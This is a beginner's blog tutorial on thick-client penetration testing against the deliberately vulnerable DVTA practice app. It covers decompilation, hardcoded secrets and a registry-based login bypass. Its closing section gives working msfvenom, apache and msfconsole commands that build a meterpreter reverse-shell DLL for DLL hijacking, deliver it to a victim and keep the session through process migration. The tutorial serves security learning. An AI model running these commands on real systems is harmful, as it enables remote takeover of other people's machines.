Hey Hackers , darshanhackz this side an Ethical Hacker as well as a Novice Security Researcher. Cause i haven’t done a big gig up till now. So what we are going to see today ?? [ Such a fool person , already the title is telling us].

So let us understand what is difference between the Thick Client and Thin Client. So that you will get idea what we are going to perform today. Even if you don’t have any idea about the Windows API, Sys-calls, Windows Binaries, Penetration Testing. Still you don’t need to worry about that cause we are going to have this article in a such way that every kiddo will understand it by reading stuff.

DISCLAIMER: We are going to do only this for learning purpose there is not any sort of bad intention of writing this articles.

[ Such a fool man , we are only going to have the recon and base stuff , a novice guide, why to add disclaimer]

Anyways.

Lets us understand about the both of the clients.

Thin Client Pentest :
A thin client is nothing but a web application where we will have most of the logic run on the server , whereas we will get the display data only within the client side itself.

Characteristic :

• It will run in the browser.
• This will you the HTTP Request and Response Methods.
• Very small resources running at client side.
• TIP : Intercept and Manipulate the Request and Response.

Thick Client Pentest :

Within thick client [ Also known as Fat Client ] the application is running logics within the client side itself. Now you will be like … Whaattt ?? Yes. I also had a same reaction.

Characteristic :

• Application installed Locally into the system.
• All the process are going to run into the local machine.
• It will communication with the server / database.
• TIP : We need to analyse the application [ Code , Design , Flaw ].

Within the thick client application there might be different type of technology that you will deal with. Mostly it will be .Net , C/C++, Java Applet, Native Android & IOS.

Let us Understand the Architecture.

See the application might be the 2-tier or 3-tier. Within the 2-tier application there will be “Application” → “Database” this connection will work. Here the communication will be by app and database only directly.

Within the 3-tier application there will be “Application” → Server ← “Database”. The middle layer of the server relies in between Application and database.

Let us understand the flaw :

[ User ]
   ↓
[ Presentation Layer ]
   ↓
[ Business Logic Layer ]  ← (Runs locally ⚠️)
   ↓
[ Local Storage ]         ← (Files / DB / Registry)
   ↓
[ Communication Layer ]   ← (HTTP / TCP)
   ↓
[ Backend Server ]
   ↓
[ Database ]

At the client side the user will connect via presentation layer. Here there will be the component of the GUI [ Such as the button , forms , Dashboards ], Input fields, Local Rendering Logics.

Then it will connect to the core layer of the thick client application that is the Business Logic Layer where Data Processing, Decision Making , Validation Rules , Authorization Check will done and all this process execute in the local env.

For storing the data we have the local storage, Here as a part of local storage we will have :

• Database : SQLite, Local DB.
• Windows Registry.

Sometime the application may do some of the communication with file transfer or may connect to internet for the authorization or flow of the data to sync on the backup server. so for this reason the application connect to the Communication Layer.

Now let us start with the pentest. So as a part of the practice we are going to use the Open Source Thick Client Practice Tool i.e., DVTA ( Damn Vulnerable Thick Client Application ).

Tool URL :

https://github.com/srini0x00/dvta

Once we have this application we will start with the basic analysis.

NOTE : We are not going to setup the database, cause we are not going to have the dynamic analysis of the application. but will tell you a way.

[ Those who want to do the dynamic analysis , they must connect the database. for that purpose a user must install the SQL Server and SQL Server Management Studio. You can setup this tool by watching the video present in the git url. But i am not gonna install this all due to less resource and much more lengthy blog. will do it in another blog]

Let us understand what this application have.

This much files you will get when you extract the DVTA Application. but the path of the file will be within : ..\..\Application\DVTA\DVTA\bin\Release. Release Directory contains all the application data. Within the above screenshot we can able to observe there is a file DVTA.exe file. Now we will open this file in the notepad. [ Basically if we observe that file is a config file ].

Inside sus part we got :

• Public Token.
• DBServer Address.
• DBusername
• DBpassword
• AESkey
• IV ; used for the encryption algorithm to store the password.
• FTP server address.

As we got this much information about the application via config file , which stored directly in the application url directly. So as an attacker i can able to take the benefits of this all information to get into the application and tamper the data.

Let us see how our application looks.

We have this traditional login page with the register user too. Now we will try to check the register page too.

So the application is having the register page , now sus content :

• Not having the input validations.
• The Username and Password Policy is not enforced.
• email id input also not configured properly.

Now let us decompile the application to understand the application code and functions as well as the callbacks those are vulnerable. Here we will use the dnspy as the Reverse Engineering Tool / decompiler of the application. The dnspy will decompile the binary and will give us the high language c# code. So will delve throughout that code for the better understanding of the application as well as to search out for the sus [vulnerability] part.

• Open dnspy → Import “DVTA” → Start Analysis.

Here if you observe within the dnspy we have pulled the “DVTA” binary. Now let us click on “DVTA.exe” → “DVTA”.

within the first directive we will get all the endpoints [Functions / Class Tree] those are present into the application. [ present on the above screenshot].

Now explore the “Admin” Function / Class Tree.

Within the “Admin” Tree we will get the multiple functions, here we will focus on the button. Within this application the button will have the ‘btnftp_click’ Class.

When we explore this function we found some sensitive information about the ftp server passkey. where as we also able to get the data storing file name, i.e, p@ssw0rd , admin.csv

Also after observing the above function we can able to get another mapping of the functions. Cause this application using multiple user created methods which are calling in the on class.

If you observe this btn_ftp Class here we can see one DBAccessClass() method is calling out to make an connection. So there might be chance the application is connecting via that method. Let us open that method.

We found out that within this callback we got another decryptPassword() method, which is stored openly. here with the help of the function a user can able to bypass the password. Cause if we know how the decryption of the username and password is went throughout the whole application then definitively attacker can able to exploit by creating the side channel script so that we can able to get the account access.

Let explore the Login → btnLogin_Click.

Now if you observe this function. the data is storing into the windows registry. So Here we can able to perform the Authentication Bypass by just changing the values into the register. within this code there is registryKey method object is used to store the value and also there is condition for the login i.e, isLoggedIn , true. So if we change this to non authenticated user , from false to true. then that user will directly get an access to the authentication. In this way by observing source code only we figure out that the user will directly get the account access without auth.

In this way we can able to perform the reverse engineering of the application. If you have a time then invest more into the source code review that we have perform just now to get the most of the vulnerabilities.

Let us explore more Information Gathering with the help of the some other tools. Here as a part of the Information Gathering what agenda we should be clear :

• Need to explore the functionality of the application.
• Architecture of the application
• Clients network communication record.
• Files hat can be accessed by the client.
• Look of the sus type of files / juicy files.

Let us explore binary with the CFF Explore , Sysinternals Suite , Wireshark tools.

CFF Explore :

This tool help us to understand about the PE files. What is PE files, Portable Executables defines the structure used to load the program into memory , this help us to understand how the code is getting executed, the import & Export , detected packets.

It will help us for the inspection of :

• .exe executables
• .dll Dynamic Link Libraries
• .sys drivers.

String View :

Imported data :

In this way we can able to check the imported data, resource directory, Debug data directory etc.

Now we are going to use the multiple tools from the sysinternal tools.

strings.exe →

This will help us to extract the strings from the binary. We will focus on the sensitive data like:

• username
• password
• APIs
• Token
• IP Address

With the help of the above command you will find the multiple sensitive data. that we have found within our dnspy likewise too.

Now we are going to use the Process Hacker.

Process Hacker will help us to identify the more information about the process that is running into the memory. Here we are just gonna run the DVTA Application and we are going to understand what process it is taking.

Now are going to observe from which memory location the supporting libraries this application taking the dll. So we will take the benefits from this execution & will try to create the dll injection or hijacking according dll.

If we observe the complete structure of the application where the complete release stored then only we are going to observe which specific dll this application required.

EXTRAS :

Let us open the release directory of the DVTA application.

If we observe here this file will take the supporting dll to connect here those are : DBAccess.dll , ExcelLibrary.dll this are the dll will take by the DVTA Application. Here we can able to create the DBAccess.dll with the malicious DLL and we are going to create the malicious dll within our kali linux.

within your linux you need to use the metasploit framework to create the malicious dll with the below command.

[ I know we are only going to perform the static analysis , but here i am just giving you another small trick for the dll hijacking method ].

root@hacker# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=1234 -a x86 -f dll > DBAccess.dll

Or else we can add the required dll that is taken by this application i.e, SECUR32.dll

root@hacker# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=1234 -a x86 -f dll > SECUR32.dll

Cause this dll will be the dll which is running into the application , it is nothing but a supporting dll file which is required by this application.

Now we are going to start our apache server.

root@hacker# cp SECUR32.dll /var/www/html 
root@hacker# service apache2 start

Now within the victim machine we will download this dll file in the “Release” folder of the thick client application.

After Saving and installing this file into the release folder, we are going to run our C2 server.

root@hacker# msfconsole 
root@hacker# use exploit/multi/handler 
root@hacker# set payload windows/meterpreter/reverse_tcp 
root@hacker# show options 
// SET EVERYTHING
root@hacker# exploit

And you will have the access of the dll file.

Now next step is to do the migration. [ Means even if the victim close the process still we will have the access of the reverse shell.

root@hacker# migrate [pid of mal dll]

After migration the process which is running into the windows will be deleted but still we will have the conversation and active session.

There are other lots of thing within the dynamic analysis. Where we are going to see alot such as the ;

• MITM Proxy
• Procmon
• ILSpy + Reflexil.
• Complete Systeinternal

Within the Thick Client Pentest we will also have some security header check scanner such as the Visual Studio Gripper this tool will do the automation scan and will try to find the vulnerability within the application.

So that set for this article soon i will give you a random testing of the random thick client application so that we will learn static as well as dynamic application penetration testing too.

Thank You for reading the complete article , make sure you follow me on LinkedIn , X , Linktree.